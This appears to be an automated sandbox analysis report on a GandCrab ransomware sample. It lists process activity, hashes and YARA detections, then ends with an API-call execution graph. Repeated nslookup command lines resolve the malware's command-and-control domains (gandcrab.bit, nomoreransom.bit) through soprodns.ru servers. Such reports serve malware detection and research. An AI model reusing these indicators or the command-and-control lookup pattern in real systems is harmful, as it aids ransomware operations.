                                      Path:C:\Users\user\AppData\Roaming\Microsoft\isqmkp.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Users\user\AppData\Roaming\Microsoft\isqmkp.exe"
                                      Imagebase:0xf9d0000
                                      File size:101710 bytes
                                      MD5 hash:F4758788F11A0DE8D11EB4B8C515FFBD
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_ReflectiveLoader, Description: Yara detected ReflectiveLoader, Source: 0000000E.00000002.315651936.000000000F9DA000.00000002.00000001.01000000.00000005.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_Gandcrab, Description: Yara detected Gandcrab, Source: 0000000E.00000000.307654244.000000000F9E2000.00000008.00000001.01000000.00000005.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_ReflectiveLoader, Description: Yara detected ReflectiveLoader, Source: 0000000E.00000000.307645700.000000000F9DA000.00000002.00000001.01000000.00000005.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_Gandcrab, Description: Yara detected Gandcrab, Source: 0000000E.00000002.315662109.000000000F9E2000.00000008.00000001.01000000.00000005.sdmp, Author: Joe Security
                                      • Rule: ReflectiveLoader, Description: Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, Source: C:\Users\user\AppData\Roaming\Microsoft\isqmkp.exe, Author: Florian Roth
                                      • Rule: SUSP_RANSOMWARE_Indicator_Jul20, Description: Detects ransomware indicator, Source: C:\Users\user\AppData\Roaming\Microsoft\isqmkp.exe, Author: Florian Roth
                                      • Rule: JoeSecurity_Gandcrab, Description: Yara detected Gandcrab, Source: C:\Users\user\AppData\Roaming\Microsoft\isqmkp.exe, Author: Joe Security
                                      • Rule: JoeSecurity_ReflectiveLoader, Description: Yara detected ReflectiveLoader, Source: C:\Users\user\AppData\Roaming\Microsoft\isqmkp.exe, Author: Joe Security
                                      • Rule: INDICATOR_SUSPICIOUS_ReflectiveLoader, Description: detects Reflective DLL injection artifacts, Source: C:\Users\user\AppData\Roaming\Microsoft\isqmkp.exe, Author: ditekSHen
                                      • Rule: Gandcrab, Description: Gandcrab Payload, Source: C:\Users\user\AppData\Roaming\Microsoft\isqmkp.exe, Author: kevoreilly
                                      Antivirus matches:
                                      • Detection: 100%, Avira
                                      • Detection: 100%, Joe Sandbox ML
                                      Reputation:low

                                      Target ID:15
                                      Start time:23:58:08
                                      Start date:31/08/2022
                                      Path:C:\Windows\SysWOW64\nslookup.exe
                                      Wow64 process (32bit):true
                                      Commandline:nslookup gandcrab.bit dns2.soprodns.ru
                                      Imagebase:0x140000
                                      File size:78336 bytes
                                      MD5 hash:8E82529D1475D67615ADCB4E1B8F4EEC
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:moderate

                                      Target ID:16
                                      Start time:23:58:13
                                      Start date:31/08/2022
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff745070000
                                      File size:625664 bytes
                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high

                                      Target ID:17
                                      Start time:23:58:16
                                      Start date:31/08/2022
                                      Path:C:\Windows\SysWOW64\nslookup.exe
                                      Wow64 process (32bit):true
                                      Commandline:nslookup nomoreransom.coin dns2.soprodns.ru
                                      Imagebase:0x140000
                                      File size:78336 bytes
                                      MD5 hash:8E82529D1475D67615ADCB4E1B8F4EEC
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:moderate

                                      Target ID:18
                                      Start time:23:58:16
                                      Start date:31/08/2022
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff745070000
                                      File size:625664 bytes
                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high

                                      Target ID:20
                                      Start time:23:58:17
                                      Start date:31/08/2022
                                      Path:C:\Users\user\AppData\Roaming\Microsoft\isqmkp.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Users\user\AppData\Roaming\Microsoft\isqmkp.exe"
                                      Imagebase:0xf9d0000
                                      File size:101710 bytes
                                      MD5 hash:F4758788F11A0DE8D11EB4B8C515FFBD
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_ReflectiveLoader, Description: Yara detected ReflectiveLoader, Source: 00000014.00000000.322631215.000000000F9DA000.00000002.00000001.01000000.00000005.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_ReflectiveLoader, Description: Yara detected ReflectiveLoader, Source: 00000014.00000002.325486891.000000000F9DA000.00000002.00000001.01000000.00000005.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_Gandcrab, Description: Yara detected Gandcrab, Source: 00000014.00000002.325494839.000000000F9E2000.00000008.00000001.01000000.00000005.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_Gandcrab, Description: Yara detected Gandcrab, Source: 00000014.00000000.322638424.000000000F9E2000.00000008.00000001.01000000.00000005.sdmp, Author: Joe Security

                                      Target ID:21
                                      Start time:23:58:19
                                      Start date:31/08/2022
                                      Path:C:\Windows\SysWOW64\nslookup.exe
                                      Wow64 process (32bit):true
                                      Commandline:nslookup nomoreransom.bit dns2.soprodns.ru
                                      Imagebase:0x140000
                                      File size:78336 bytes
                                      MD5 hash:8E82529D1475D67615ADCB4E1B8F4EEC
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language

                                      Target ID:22
                                      Start time:23:58:19
                                      Start date:31/08/2022
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff745070000
                                      File size:625664 bytes
                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language

                                      Target ID:23
                                      Start time:23:58:22
                                      Start date:31/08/2022
                                      Path:C:\Windows\SysWOW64\nslookup.exe
                                      Wow64 process (32bit):true
                                      Commandline:nslookup gandcrab.bit dns1.soprodns.ru
                                      Imagebase:0x140000
                                      File size:78336 bytes
                                      MD5 hash:8E82529D1475D67615ADCB4E1B8F4EEC
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language

                                      Target ID:24
                                      Start time:23:58:23
                                      Start date:31/08/2022
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff68f300000
                                      File size:625664 bytes
                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language

                                      Target ID:25
                                      Start time:23:58:25
                                      Start date:31/08/2022
                                      Path:C:\Windows\SysWOW64\nslookup.exe
                                      Wow64 process (32bit):true
                                      Commandline:nslookup nomoreransom.coin dns1.soprodns.ru
                                      Imagebase:0x140000
                                      File size:78336 bytes
                                      MD5 hash:8E82529D1475D67615ADCB4E1B8F4EEC
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language

                                      Target ID:26
                                      Start time:23:58:26
                                      Start date:31/08/2022
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff745070000
                                      File size:625664 bytes
                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language

                                      Target ID:27
                                      Start time:23:58:28
                                      Start date:31/08/2022
                                      Path:C:\Windows\SysWOW64\nslookup.exe
                                      Wow64 process (32bit):true
                                      Commandline:nslookup nomoreransom.bit dns1.soprodns.ru
                                      Imagebase:0x7ff651c80000
                                      File size:78336 bytes
                                      MD5 hash:8E82529D1475D67615ADCB4E1B8F4EEC
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language

                                      Target ID:28
                                      Start time:23:58:31
                                      Start date:31/08/2022
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff745070000
                                      File size:625664 bytes
                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language

                                      Target ID:30
                                      Start time:23:58:34
                                      Start date:31/08/2022
                                      Path:C:\Windows\SysWOW64\nslookup.exe
                                      Wow64 process (32bit):true
                                      Commandline:nslookup gandcrab.bit dns2.soprodns.ru
                                      Imagebase:0x140000
                                      File size:78336 bytes
                                      MD5 hash:8E82529D1475D67615ADCB4E1B8F4EEC
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language

                                      Target ID:31
                                      Start time:23:58:34
                                      Start date:31/08/2022
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff745070000
                                      File size:625664 bytes
                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language

                                      Target ID:33
                                      Start time:23:58:37
                                      Start date:31/08/2022
                                      Path:C:\Windows\SysWOW64\nslookup.exe
                                      Wow64 process (32bit):true
                                      Commandline:nslookup nomoreransom.coin dns2.soprodns.ru
                                      Imagebase:0x140000
                                      File size:78336 bytes
                                      MD5 hash:8E82529D1475D67615ADCB4E1B8F4EEC
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language

                                      Target ID:34
                                      Start time:23:58:37
                                      Start date:31/08/2022
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff745070000
                                      File size:625664 bytes
                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language

                                      Target ID:36
                                      Start time:23:58:40
                                      Start date:31/08/2022
                                      Path:C:\Windows\SysWOW64\nslookup.exe
                                      Wow64 process (32bit):true
                                      Commandline:nslookup nomoreransom.bit dns2.soprodns.ru
                                      Imagebase:0x140000
                                      File size:78336 bytes
                                      MD5 hash:8E82529D1475D67615ADCB4E1B8F4EEC
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language

                                      Target ID:37
                                      Start time:23:58:41
                                      Start date:31/08/2022
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff745070000
                                      File size:625664 bytes
                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language

                                      Target ID:39
                                      Start time:23:58:44
                                      Start date:31/08/2022
                                      Path:C:\Windows\SysWOW64\nslookup.exe
                                      Wow64 process (32bit):true
                                      Commandline:nslookup gandcrab.bit dns1.soprodns.ru
                                      Imagebase:0x140000
                                      File size:78336 bytes
                                      MD5 hash:8E82529D1475D67615ADCB4E1B8F4EEC
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language

                                      Target ID:40
                                      Start time:23:58:45
                                      Start date:31/08/2022
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff745070000
                                      File size:625664 bytes
                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language

                                      Target ID:41
                                      Start time:23:58:48
                                      Start date:31/08/2022
                                      Path:C:\Windows\SysWOW64\nslookup.exe
                                      Wow64 process (32bit):true
                                      Commandline:nslookup nomoreransom.coin dns1.soprodns.ru
                                      Imagebase:0x140000
                                      File size:78336 bytes
                                      MD5 hash:8E82529D1475D67615ADCB4E1B8F4EEC
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language

                                      Target ID:42
                                      Start time:23:58:49
                                      Start date:31/08/2022
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff745070000
                                      File size:625664 bytes
                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language

                                      Target ID:43
                                      Start time:23:58:53
                                      Start date:31/08/2022
                                      Path:C:\Windows\SysWOW64\nslookup.exe
                                      Wow64 process (32bit):true
                                      Commandline:nslookup nomoreransom.bit dns1.soprodns.ru
                                      Imagebase:0x140000
                                      File size:78336 bytes
                                      MD5 hash:8E82529D1475D67615ADCB4E1B8F4EEC
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language

                                      Target ID:44
                                      Start time:23:58:53
                                      Start date:31/08/2022
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff745070000
                                      File size:625664 bytes
                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language

                                      Target ID:45
                                      Start time:23:58:55
                                      Start date:31/08/2022
                                      Path:C:\Windows\SysWOW64\nslookup.exe
                                      Wow64 process (32bit):true
                                      Commandline:nslookup gandcrab.bit dns2.soprodns.ru
                                      Imagebase:0x140000
                                      File size:78336 bytes
                                      MD5 hash:8E82529D1475D67615ADCB4E1B8F4EEC
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language

                                      Target ID:46
                                      Start time:23:58:56
                                      Start date:31/08/2022
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff745070000
                                      File size:625664 bytes
                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language

                                      Target ID:47
                                      Start time:23:58:57
                                      Start date:31/08/2022
                                      Path:C:\Windows\SysWOW64\nslookup.exe
                                      Wow64 process (32bit):true
                                      Commandline:nslookup nomoreransom.coin dns2.soprodns.ru
                                      Imagebase:0x140000
                                      File size:78336 bytes
                                      MD5 hash:8E82529D1475D67615ADCB4E1B8F4EEC
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language

                                      Target ID:48
                                      Start time:23:58:58
                                      Start date:31/08/2022
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff745070000
                                      File size:625664 bytes
                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language

                                      Target ID:49
                                      Start time:23:59:00
                                      Start date:31/08/2022
                                      Path:C:\Windows\SysWOW64\nslookup.exe
                                      Wow64 process (32bit):true
                                      Commandline:nslookup nomoreransom.bit dns2.soprodns.ru
                                      Imagebase:0x140000
                                      File size:78336 bytes
                                      MD5 hash:8E82529D1475D67615ADCB4E1B8F4EEC
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language

                                      Target ID:50
                                      Start time:23:59:00
                                      Start date:31/08/2022
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff745070000
                                      File size:625664 bytes
                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language

                                      Target ID:51
                                      Start time:23:59:02
                                      Start date:31/08/2022
                                      Path:C:\Windows\SysWOW64\nslookup.exe
                                      Wow64 process (32bit):true
                                      Commandline:nslookup gandcrab.bit dns1.soprodns.ru
                                      Imagebase:0x140000
                                      File size:78336 bytes
                                      MD5 hash:8E82529D1475D67615ADCB4E1B8F4EEC
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language

                                      Target ID:52
                                      Start time:23:59:02
                                      Start date:31/08/2022
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff745070000
                                      File size:625664 bytes
                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language

                                      Target ID:53
                                      Start time:23:59:04
                                      Start date:31/08/2022
                                      Path:C:\Windows\SysWOW64\nslookup.exe
                                      Wow64 process (32bit):true
                                      Commandline:nslookup nomoreransom.coin dns1.soprodns.ru
                                      Imagebase:0x140000
                                      File size:78336 bytes
                                      MD5 hash:8E82529D1475D67615ADCB4E1B8F4EEC
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language

                                      Target ID:55
                                      Start time:23:59:04
                                      Start date:31/08/2022
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff745070000
                                      File size:625664 bytes
                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language

                                      Target ID:58
                                      Start time:23:59:07
                                      Start date:31/08/2022
                                      Path:C:\Windows\SysWOW64\nslookup.exe
                                      Wow64 process (32bit):true
                                      Commandline:nslookup nomoreransom.bit dns1.soprodns.ru
                                      Imagebase:0x140000
                                      File size:78336 bytes
                                      MD5 hash:8E82529D1475D67615ADCB4E1B8F4EEC
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language

                                      Target ID:59
                                      Start time:23:59:08
                                      Start date:31/08/2022
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff745070000
                                      File size:625664 bytes
                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language

                                      Target ID:60
                                      Start time:23:59:13
                                      Start date:31/08/2022
                                      Path:C:\Windows\SysWOW64\nslookup.exe
                                      Wow64 process (32bit):true
                                      Commandline:nslookup gandcrab.bit dns2.soprodns.ru
                                      Imagebase:0x140000
                                      File size:78336 bytes
                                      MD5 hash:8E82529D1475D67615ADCB4E1B8F4EEC
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language

                                      Target ID:61
                                      Start time:23:59:13
                                      Start date:31/08/2022
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff745070000
                                      File size:625664 bytes
                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language

                                        Execution Graph

                                        Execution Coverage:26.9%
                                        Dynamic/Decrypted Code Coverage:0%
                                        Signature Coverage:41.9%
                                        Total number of Nodes:697
                                        Total number of Limit Nodes:17
1917->1923 1924 fc677b4 VirtualFree 1917->1924 1922 fc672b0 5 API calls 1918->1922 1935 fc67140 1919->1935 1920->1919 1921 fc679b9 1920->1921 2023 fc66e90 1921->2023 1922->1917 1923->1924 1924->1903 1927 fc67862 GetDriveTypeW 1927->1933 1929 fc679c4 VirtualFree 1929->1919 1930 fc67889 lstrcatW lstrcatW lstrcatW GetDiskFreeSpaceW 1931 fc67963 lstrcatW 1930->1931 1930->1933 1931->1933 1932 fc67983 lstrlenW 1932->1915 1933->1927 1933->1930 1933->1932 1934 fc678fc lstrlenW wsprintfW lstrlenW wsprintfW lstrcatW 1933->1934 1934->1933 1936 fc67150 1935->1936 1937 fc6718f lstrlenW lstrlenW 1936->1937 1938 fc671aa 1936->1938 1937->1938 1939 fc671b0 lstrlenW lstrlenW 1938->1939 1940 fc671cb 1938->1940 1939->1940 1941 fc671d1 lstrlenW lstrlenW 1940->1941 1942 fc671ec 1940->1942 1941->1942 1943 fc671f2 lstrlenW lstrlenW 1942->1943 1944 fc6720d 1942->1944 1943->1944 1945 fc67213 lstrlenW lstrlenW 1944->1945 1946 fc6722e 1944->1946 1945->1946 1947 fc67234 lstrlenW lstrlenW 1946->1947 1948 fc6724f 1946->1948 1947->1948 1949 fc6725e lstrlenW lstrlenW 1948->1949 1950 fc67279 1948->1950 1949->1950 1951 fc672a7 1950->1951 1952 fc67282 lstrlenW lstrlenW 1950->1952 1951->1742 1952->1742 1954 fc66f7c 1953->1954 1955 fc66f5a lstrcatW lstrcatW lstrcatW lstrcatW 1953->1955 1956 fc66f81 lstrcatW lstrcatW lstrcatW lstrcatW 1954->1956 1957 fc66f9d 1954->1957 1955->1954 1956->1957 1958 fc66fa3 lstrcatW lstrcatW lstrcatW lstrcatW 1957->1958 1959 fc66fbf 1957->1959 1958->1959 1960 fc66fc5 lstrcatW lstrcatW lstrcatW lstrcatW 1959->1960 1961 fc66fe1 1959->1961 1960->1961 1962 fc66fe7 lstrcatW lstrcatW lstrcatW lstrcatW 1961->1962 1963 fc67003 1961->1963 1962->1963 1964 fc67025 1963->1964 1965 fc67009 lstrcatW lstrcatW lstrcatW lstrcatW 1963->1965 1966 fc67047 1964->1966 1967 fc6702b lstrcatW lstrcatW lstrcatW lstrcatW 1964->1967 1965->1964 1968 fc6704d lstrcatW lstrcatW lstrcatW lstrcatW 1966->1968 1969 fc67069 1966->1969 1967->1966 1968->1969 1970 fc6706f lstrcatW lstrcatW lstrcatW lstrcatW 
1969->1970 1971 fc6708b 1969->1971 1970->1971 1972 fc67091 VirtualAlloc 1971->1972 1973 fc670fc 1971->1973 1976 fc670c1 wsprintfW 1972->1976 1977 fc670ac wsprintfW 1972->1977 1974 fc67102 lstrcatW lstrcatW lstrcatW lstrcatW 1973->1974 1975 fc6711e lstrlenW 1973->1975 1974->1975 1975->1746 1978 fc670d0 lstrcatW lstrcatW lstrcatW lstrcatW VirtualFree 1976->1978 1977->1978 1978->1973 1980 fc67c1f VirtualFree 1979->1980 1981 fc67c2b 1979->1981 1980->1981 1982 fc67c31 VirtualFree 1981->1982 1983 fc67c3d 1981->1983 1982->1983 1984 fc67c43 VirtualFree 1983->1984 1985 fc67c4f 1983->1985 1984->1985 1986 fc67c55 VirtualFree 1985->1986 1987 fc67c61 1985->1987 1986->1987 1988 fc67c67 VirtualFree 1987->1988 1989 fc67c73 1987->1989 1988->1989 1990 fc67c85 1989->1990 1991 fc67c79 VirtualFree 1989->1991 1992 fc67c97 1990->1992 1993 fc67c8b VirtualFree 1990->1993 1991->1990 1994 fc67c9d VirtualFree 1992->1994 1995 fc67ca9 1992->1995 1993->1992 1994->1995 1996 fc67caf VirtualFree 1995->1996 1997 fc67cbb 1995->1997 1996->1997 1998 fc67cc4 VirtualFree 1997->1998 1999 fc646da 1997->1999 1998->1999 1999->1694 1999->1695 2001 fc672d2 RegQueryValueExW 2000->2001 2002 fc6731e 2000->2002 2003 fc67306 GetLastError RegCloseKey 2001->2003 2004 fc672f1 RegCloseKey 2001->2004 2002->1886 2003->1886 2004->1886 2006 fc67ad2 2005->2006 2007 fc67aac CreateToolhelp32Snapshot 2005->2007 2006->1901 2008 fc67ac4 VirtualFree 2007->2008 2009 fc67add Process32FirstW 2007->2009 2008->2006 2010 fc67bcd VirtualFree FindCloseChangeNotification 2009->2010 2011 fc67afd 2009->2011 2012 fc67bf7 2010->2012 2013 fc67bed VirtualFree 2010->2013 2015 fc67ba7 2011->2015 2016 fc67b10 lstrcmpiW 2011->2016 2018 fc67b4f lstrcatW lstrcatW 2011->2018 2019 fc67b3a lstrcpyW lstrcatW 2011->2019 2021 fc67b87 Process32NextW 2011->2021 2012->1901 2013->2012 2014 fc67bc5 2014->2010 2015->2014 2017 fc67bb5 lstrlenW 2015->2017 2016->2011 2017->2014 2020 fc67b60 lstrlenW 2018->2020 2019->2020 2020->2021 2021->2015 2022 fc67b98 
GetLastError 2021->2022 2022->2011 2022->2015 2033 fc67ce0 InternetOpenW 2023->2033 2027 fc66ee6 2028 fc66f11 VirtualFree 2027->2028 2029 fc66eea lstrlenA 2027->2029 2031 fc66f26 InternetCloseHandle 2028->2031 2032 fc66f2d 2028->2032 2029->2028 2030 fc66efa wsprintfW 2029->2030 2030->2028 2031->2032 2032->1919 2032->1929 2034 fc66ea2 VirtualAlloc lstrlenW 2033->2034 2035 fc67ecd InternetOpenW 2033->2035 2036 fc67ef0 2034->2036 2035->2034 2037 fc67f02 InternetCloseHandle 2036->2037 2038 fc67f09 2036->2038 2037->2038 2039 fc67ce0 2 API calls 2038->2039 2040 fc67f10 InternetConnectW 2039->2040 2041 fc67f41 VirtualAlloc wsprintfW HttpOpenRequestW 2040->2041 2042 fc67f38 2040->2042 2043 fc68062 InternetCloseHandle InternetCloseHandle VirtualFree 2041->2043 2044 fc67f91 HttpAddRequestHeadersW 2041->2044 2042->2027 2043->2027 2044->2043 2045 fc67ff8 HttpSendRequestW 2044->2045 2046 fc6800f InternetReadFile 2045->2046 2047 fc6805c GetLastError 2045->2047 2046->2043 2048 fc6802e 2046->2048 2047->2043 2048->2043 2049 fc68037 InternetReadFile 2048->2049 2049->2048 2050 fc6805a 2049->2050 2050->2043 2051->1767 2053 fc66305 CryptGenKey 2052->2053 2054 fc662cf GetLastError 2052->2054 2056 fc66322 CryptExportKey CryptExportKey CryptDestroyKey CryptReleaseContext CryptAcquireContextW 2053->2056 2057 fc66321 2053->2057 2055 fc662dc CryptAcquireContextW 2054->2055 2058 fc662f5 2054->2058 2055->2058 2059 fc662fc 2055->2059 2056->2058 2057->2056 2058->1705 2059->2053 2060->1788 2062 fc65bcc lstrlenA 2061->2062 2062->1816 2064 fc67ce0 2 API calls 2063->2064 2065 fc654bc 2064->2065 2081 fc65060 VirtualAlloc 2065->2081 2068 fc65503 lstrcatA lstrcatA lstrlenA 2070 fc69010 _memset 2068->2070 2071 fc65592 lstrcpyW 2070->2071 2090 fc653a0 VirtualAlloc GetModuleFileNameW CreateFileW 2071->2090 2073 fc655b2 lstrlenW lstrlenA 2074 fc67ef0 15 API calls 2073->2074 2076 fc655f4 2074->2076 2075 fc65628 VirtualFree VirtualFree VirtualFree 2077 fc65657 InternetCloseHandle 2075->2077 2078 fc6565e 
2075->2078 2076->2075 2100 fc65210 lstrlenA VirtualAlloc 2076->2100 2077->2078 2078->1826 2078->1827 2080 fc65614 2080->2075 2082 fc6517f lstrlenA VirtualAlloc VirtualAlloc 2081->2082 2083 fc650d9 2081->2083 2082->2068 2084 fc650fe Sleep 2083->2084 2085 fc65109 lstrlenW VirtualAlloc 2083->2085 2084->2085 2121 fc64e90 CreatePipe 2085->2121 2087 fc65134 lstrcmpiA 2088 fc65147 VirtualFree 2087->2088 2089 fc6515c wsprintfW VirtualFree 2087->2089 2088->2083 2089->2082 2091 fc65487 VirtualFree 2090->2091 2092 fc653f9 CreateFileMappingW 2090->2092 2091->2073 2093 fc65480 CloseHandle 2092->2093 2094 fc65411 MapViewOfFile 2092->2094 2093->2091 2095 fc65477 CloseHandle 2094->2095 2096 fc65427 lstrlenW lstrlenA 2094->2096 2095->2093 2097 fc65444 lstrlenA 2096->2097 2098 fc65468 UnmapViewOfFile 2096->2098 2097->2098 2098->2095 2101 fc65246 CryptStringToBinaryA 2100->2101 2103 fc65385 GetLastError 2101->2103 2104 fc6526c _memset 2101->2104 2105 fc6536c VirtualFree 2103->2105 2106 fc652b0 lstrlenA 2104->2106 2105->2080 2107 fc652ce 2106->2107 2150 fc633e0 2107->2150 2110 fc6538d 2160 fc65190 VirtualAlloc VirtualAlloc 2110->2160 2111 fc652fa 2112 fc65341 2111->2112 2113 fc6531c lstrlenA VirtualAlloc 2111->2113 2117 fc6535d 2112->2117 2119 fc65355 HeapFree 2112->2119 2113->2112 2116 fc65339 lstrcpyA 2113->2116 2116->2112 2118 fc65369 2117->2118 2120 fc65366 HeapFree 2117->2120 